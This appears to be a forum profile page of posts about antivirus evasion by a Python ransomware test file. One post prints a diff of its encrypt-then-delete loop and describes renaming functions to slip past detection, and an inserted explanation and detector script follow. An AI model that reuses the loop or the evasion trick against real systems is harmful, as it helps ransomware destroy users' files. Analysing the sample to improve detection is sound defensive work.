About RoboMan
  1. Imagine they're unusable because their antivirus couldn't stop a ransomware script. Either way, as mentioned before, the only solution would be default denying.
  2. Marcos, I agree and understand what your point is; nevertheless we can't compromise security in exchange for lower FPs. I deeply believe this is not a matter to discuss in terms of signature or behaviour detection, but actually in terms of default deny and software restriction. The only way to assure the user isn't getting infected by a random script is to block it by default. An advanced user can later unblock it/whitelist it if he was intentionally running it; but most novice/normal users will not even realise there was a Python script running in the background, therefore a default deny action over it would be enough to avoid infection, don't you think?
  3. - encrypt(dir+filename, dir+filename+""".enc""") + encrypt(dir+filename, dir+filename+".enc")
  4. Thank you. I hope devs find a way to fight back this kind of malware; OP realized it was being detected and counter-responded (still it's educational) --- pyrate.py 2020-05-11 16:02:57.354937100 +0000 +++ "pyrate - Copy.py" 2020-05-04 20:34:50.040466800 +0000 @@ -11,7 +11,7 @@ return buf.value -def enc(src, dst): +def encrypt(src, dst): print("Encrypting " + dst) srcfile = open(src, 'rb') dstfile = open(dst, 'wb') @@ -19,10 +19,10 @@ srcfile.close() dstfile.close() os.remove(src) -def ran(dir): +def ransom(dir): for filename in os.listdir(dir): if not filename.endswith(".enc"): - enc(dir+filename, dir+filename+".enc") + encrypt(dir+filename, dir+filename+".enc") -ran(find_mydocs()+"\\test\\") +ransom(find_mydocs()+"\\test\\") Hopefully devs find a way to cut it off from root
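Review bot: in the first hunk (`@@ -11,7 +11,7 @@`) the only changed line is the `def` name, `enc` versus `encrypt`; the body lines `print("Encrypting " + dst)`, `open(src, 'rb')` and `open(dst, 'wb')` are unchanged context on both sides. Note the direction of the diff: the `---` side is pyrate.py dated 2020-05-11 and the `+++` side is "pyrate - Copy.py" dated 2020-05-04, so the newer file is the one with the shortened names. A detection keyed on the identifier string `encrypt` is defeated by this hunk; one keyed on the "Encrypting " literal or on the open-read/open-write sequence is not.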
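Review bot: the second hunk (`@@ -19,10 +19,10 @@`) likewise only renames `ran` to `ransom` and updates the two call sites; `os.remove(src)`, the `os.listdir(dir)` loop and the `if not filename.endswith(".enc")` guard are unchanged on both sides, so the observable behaviour (write `<name>.enc`, delete `<name>`, skip files already ending in `.enc`) is identical in the two versions. The entry point `find_mydocs()+"\\test\\"` also shows the script only touches a `test` subfolder of My Documents, which matches the description of it as a test file. If one version was detected and the other was not, the difference can only have been the names, not the behaviour.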
  5. Are you sure this isn't a Windows configuration rather than ESET? Windows 10 usually re-opens many applications (their interface) after a reboot; by default it remembers everything you had opened.
  6. Marcos, I just sent the download link, you can check your inbox. I'd like your insight on the matter please.
  7. I play my secret card, level 100, which counters ignored threads by staff: tagging @Marcos
  8. Hello everybody, evening to y'all. Well, basically this: https://malwaretips.com/threads/pyrate-behavior-blocker-bypass-poc-3.100636/ MacDefender has over time shared several files that bypass many antivirus behaviour blockers by using 3rd party signed executable files, like 7-zip. He just recently shared a recreational malware test file using Python, which dodged any ESET protection. I believe this isn't as bad, since using a signed, trusted file for malicious activity is difficult to deal with (CCleaner case, for example). I'd like to know your opinion, why ESET fails to realize what's going on, and how to prevent this kind of attack from happening. As it goes: If you'd like the sample to have a closer look, I can share it over DM to avoid catastrophes.
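Posts 4 and 8 above turn on the same point: the script's author renamed `encrypt`/`ransom` to `enc`/`ran` and the file stopped being detected, which means the detection keyed on names rather than on what the loop does (create `<name>.enc`, then delete `<name>`, for many files in quick succession). The following is an added example, not code from the forum, from ESET or from the pyrate author, of a behavioural heuristic that sees only file events and is therefore blind to any renaming in the script. The event trace, the process IDs, the `C:\Users\alice\Documents\test\` path and the `.enc` suffix are all constructed for the demonstration; the thresholds are illustrative assumptions.

```python
"""Behavioural heuristic for the 'write <name>.enc, delete <name>' loop.

Added example: works on a constructed file-event trace, not on source code,
so renaming functions inside the script cannot affect it.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class FileEvent:
    ts: float   # seconds since trace start
    pid: int    # process that performed the operation
    op: str     # "create" | "write" | "delete"
    path: str


def _reencrypt_trace(pid, start, names, suffix=".enc", step=0.3):
    """Constructed trace of the loop shown in the posted diff: for each
    original file, create <name><suffix>, write it, then delete <name>."""
    events, t = [], start
    for name in names:
        events += [
            FileEvent(t, pid, "create", name + suffix),
            FileEvent(t + 0.1, pid, "write", name + suffix),
            FileEvent(t + 0.2, pid, "delete", name),
        ]
        t += step
    return events


# Constructed sample directory (hypothetical path, not from the page).
DOCS = "C:\\Users\\alice\\Documents\\test\\"

SAMPLE_EVENTS = (
    # pid 4242: the scripted loop over six documents
    _reencrypt_trace(4242, 100.0, [DOCS + f"report{i}.docx" for i in range(6)])
    # pid 777: a backup tool that writes .enc copies but keeps the originals
    + [FileEvent(50.0 + i, 777, "create", DOCS + f"photo{i}.jpg.enc") for i in range(8)]
    # pid 1001: ordinary editor churn, a temp file created and removed
    + [FileEvent(200.0, 1001, "create", DOCS + "notes.txt~"),
       FileEvent(200.5, 1001, "delete", DOCS + "notes.txt~")]
)


def detect_reencrypt(events, suffix=".enc", window=10.0, threshold=5):
    """Return the set of pids that, within `window` seconds, completed at
    least `threshold` 'replace' pairs: a create of <path><suffix> followed
    by a delete of <path>. Creating .enc files alone (backup) or deleting
    files alone (cleanup) does not count; only the paired pattern does."""
    by_pid = defaultdict(list)
    for e in events:
        by_pid[e.pid].append(e)

    flagged = set()
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e.ts)
        created = {}    # path-with-suffix -> creation timestamp
        hits = deque()  # timestamps of completed replace pairs in the window
        for e in evs:
            if e.op == "create" and e.path.endswith(suffix):
                created[e.path] = e.ts
            elif e.op == "delete":
                t_create = created.pop(e.path + suffix, None)
                if t_create is None or e.ts - t_create > window:
                    continue
                hits.append(e.ts)
                while hits and e.ts - hits[0] > window:
                    hits.popleft()
                if len(hits) >= threshold:
                    flagged.add(pid)
                    break
    return flagged


if __name__ == "__main__":
    print("flagged pids:", detect_reencrypt(SAMPLE_EVENTS))
```

The rule fires on the sixth-document loop but not on the backup tool (no deletes) or the editor (no matching `.enc` create), which is the distinction a behaviour blocker has to make; a real product would additionally look at entropy of the written data and at the parent process (here, an unsigned interpreter launched from a user directory), but none of that depends on what the script calls its functions.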
  9. Greetings. I've been having the same yellow alert issue for some days, even today a couple of times. It appears randomly whenever I'm surfing the web and I use a Wi-Fi connection. I would like to know if there's a risk when receiving such a server? Like, LiveGrid servers are not accessible at all, so no protection from that module? Anyways, the alert is just present for some seconds, maybe a minute, till it disappears.